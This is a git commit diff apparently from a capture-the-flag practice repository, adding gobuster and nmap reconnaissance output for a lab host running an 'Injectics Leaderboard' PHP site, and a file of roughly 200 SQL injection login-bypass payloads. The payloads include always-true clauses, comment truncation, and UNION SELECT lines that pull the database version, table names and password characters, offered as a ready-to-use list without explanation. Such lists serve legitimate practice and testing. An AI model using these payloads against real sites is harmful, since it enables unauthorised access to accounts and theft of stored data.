2026-03-11

2026-03-11 10:56:27 +01:00
parent 1b6dfea090
commit 0e30222666
37 changed files with 4467 additions and 0 deletions
--- a/CTF/Injections/gobuster.txt
+++ b/CTF/Injections/gobuster.txt
@@ -0,0 +1,13 @@
+/index.php           [32m (Status: 200)[0m [Size: 6588]
+/login.php           [32m (Status: 200)[0m [Size: 5401]
+/mail.log            [32m (Status: 200)[0m [Size: 1098]
+/flags               [36m (Status: 301)[0m [Size: 314][34m [--> http://10.82.175.205/flags/][0m
+/css                 [36m (Status: 301)[0m [Size: 312][34m [--> http://10.82.175.205/css/][0m
+/js                  [36m (Status: 301)[0m [Size: 311][34m [--> http://10.82.175.205/js/][0m
+/javascript          [36m (Status: 301)[0m [Size: 319][34m [--> http://10.82.175.205/javascript/][0m
+/logout.php          [36m (Status: 302)[0m [Size: 0][34m [--> index.php][0m
+/vendor              [36m (Status: 301)[0m [Size: 315][34m [--> http://10.82.175.205/vendor/][0m
+/dashboard.php       [36m (Status: 302)[0m [Size: 0][34m [--> dashboard.php][0m
+/functions.php       [32m (Status: 200)[0m [Size: 0]
+/phpmyadmin          [36m (Status: 301)[0m [Size: 319][34m [--> http://10.82.175.205/phpmyadmin/][0m
+/conn.php            [32m (Status: 200)[0m [Size: 0]
--- a/CTF/Injections/hist/nmap_scan1.nmap
+++ b/CTF/Injections/hist/nmap_scan1.nmap
--- a/CTF/Injections/hist/nmap_scan2.nmap
+++ b/CTF/Injections/hist/nmap_scan2.nmap
--- a/CTF/Injections/hist/pass.txt
+++ b/CTF/Injections/hist/pass.txt
--- a/CTF/Injections/nmap_scan.txt
+++ b/CTF/Injections/nmap_scan.txt
@@ -0,0 +1,32 @@
+# Nmap 7.95 scan initiated Fri Dec 12 11:49:33 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan.txt 10.82.175.205
+Nmap scan report for 10.82.175.205
+Host is up (0.042s latency).
+Not shown: 65533 closed tcp ports (reset)
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   3072 27:7b:ea:74:bf:6d:16:89:c8:54:28:1e:c8:2b:f1:56 (RSA)
+|   256 37:2b:c1:36:20:7e:17:bf:83:b3:3d:3e:06:3e:12:a4 (ECDSA)
+|_  256 fd:87:f9:03:11:6c:d9:3c:fc:d1:d3:88:b3:bf:c7:91 (ED25519)
+80/tcp open  http    Apache httpd 2.4.41
+| http-cookie-flags: 
+|   /: 
+|     PHPSESSID: 
+|_      httponly flag not set
+|_http-title: Injectics Leaderboard
+|_http-server-header: Apache/2.4.41 (Ubuntu)
+Device type: general purpose
+Running: Linux 4.X
+OS CPE: cpe:/o:linux:linux_kernel:4.15
+OS details: Linux 4.15
+Network Distance: 3 hops
+Service Info: Host: ip-10-82-175-205.eu-west-1.compute.internal; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+TRACEROUTE (using port 80/tcp)
+HOP RTT      ADDRESS
+1   39.12 ms 192.168.128.1
+2   ...
+3   40.22 ms 10.82.175.205
+
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Dec 12 11:50:22 2025 -- 1 IP address (1 host up) scanned in 49.22 seconds
--- a/CTF/Injections/sqli_bypass.txt
+++ b/CTF/Injections/sqli_bypass.txt
@@ -0,0 +1,198 @@
+'-'
+' '
+'&'
+'^'
+'*'
+' or ''-'
+' or '' '
+' or ''&'
+' or ''^'
+' or ''*'
+"-"
+" "
+"&"
+"^"
+"*"
+" or ""-"
+" or "" "
+" or ""&"
+" or ""^"
+" or ""*"
+or true--
+" or true--
+' or true--
+") or true--
+') or true--
+' or 'x'='x
+') or ('x')=('x
+')) or (('x'))=(('x
+" or "x"="x
+") or ("x")=("x
+")) or (("x"))=(("x
+or 1=1
+or 1=1--
+or 1=1#
+or 1=1/*
+admin' --
+admin' #
+admin'/*
+admin' or '1'='1
+admin' or '1'='1'--
+admin' or '1'='1'#
+admin' or '1'='1'/*
+admin'or 1=1 or ''='
+admin' or 1=1
+admin' or 1=1--
+admin' or 1=1#
+admin' or 1=1/*
+admin') or ('1'='1
+admin') or ('1'='1'--
+admin') or ('1'='1'#
+admin') or ('1'='1'/*
+admin') or '1'='1
+admin') or '1'='1'--
+admin') or '1'='1'#
+admin') or '1'='1'/*
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
+admin" --
+admin" #
+admin"/*
+admin" or "1"="1
+admin" or "1"="1"--
+admin" or "1"="1"#
+admin" or "1"="1"/*
+admin"or 1=1 or ""="
+admin" or 1=1
+admin" or 1=1--
+admin" or 1=1#
+admin" or 1=1/*
+admin") or ("1"="1
+admin") or ("1"="1"--
+admin") or ("1"="1"#
+admin") or ("1"="1"/*
+admin") or "1"="1
+admin") or "1"="1"--
+admin") or "1"="1"#
+admin") or "1"="1"/*
+1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
+==
+=
+'
+' --
+' #
+' –
+'--
+'/*
+'#
+" --
+" #
+"/*
+' and 1='1
+' and a='a
+ or 1=1
+ or true
+' or ''='
+" or ""="
+1′) and '1′='1–
+' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
+" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
+ and 1=1
+ and 1=1–
+' and 'one'='one
+' and 'one'='one–
+' group by password having 1=1--
+' group by userid having 1=1--
+' group by username having 1=1--
+ like '%'
+ or 0=0 --
+ or 0=0 #
+ or 0=0 –
+' or         0=0 #
+' or 0=0 --
+' or 0=0 #
+' or 0=0 –
+" or 0=0 --
+" or 0=0 #
+" or 0=0 –
+%' or '0'='0
+ or 1=1
+ or 1=1--
+ or 1=1/*
+ or 1=1#
+ or 1=1–
+' or 1=1--
+' or '1'='1
+' or '1'='1'--
+' or '1'='1'/*
+' or '1'='1'#
+' or '1′='1
+' or 1=1
+' or 1=1 --
+' or 1=1 –
+' or 1=1--
+' or 1=1;#
+' or 1=1/*
+' or 1=1#
+' or 1=1–
+') or '1'='1
+') or '1'='1--
+') or '1'='1'--
+') or '1'='1'/*
+') or '1'='1'#
+') or ('1'='1
+') or ('1'='1--
+') or ('1'='1'--
+') or ('1'='1'/*
+') or ('1'='1'#
+'or'1=1
+'or'1=1′
+" or "1"="1
+" or "1"="1"--
+" or "1"="1"/*
+" or "1"="1"#
+" or 1=1
+" or 1=1 --
+" or 1=1 –
+" or 1=1--
+" or 1=1/*
+" or 1=1#
+" or 1=1–
+") or "1"="1
+") or "1"="1"--
+") or "1"="1"/*
+") or "1"="1"#
+") or ("1"="1
+") or ("1"="1"--
+") or ("1"="1"/*
+") or ("1"="1"#
+) or '1′='1–
+) or ('1′='1–
+' or 1=1 LIMIT 1;#
+'or 1=1 or ''='
+"or 1=1 or ""="
+' or 'a'='a
+' or a=a--
+' or a=a–
+') or ('a'='a
+" or "a"="a
+") or ("a"="a
+') or ('a'='a and hi") or ("a"="a
+' or 'one'='one
+' or 'one'='one–
+' or uid like '%
+' or uname like '%
+' or userid like '%
+' or user like '%
+' or username like '%
+' or 'x'='x
+') or ('x'='x
+" or "x"="x
+' OR 'x'='x'#;
+'=' 'or' and '=' 'or'
+' UNION ALL SELECT 1, @@version;#
+' UNION ALL SELECT system_user(),user();#
+' UNION select table_schema,table_name FROM information_Schema.tables;#
+admin' and substring(password/text(),1,1)='7
+' and substring(password/text(),1,1)='7
+' or 1=1 limit 1 -- -+
+'="or'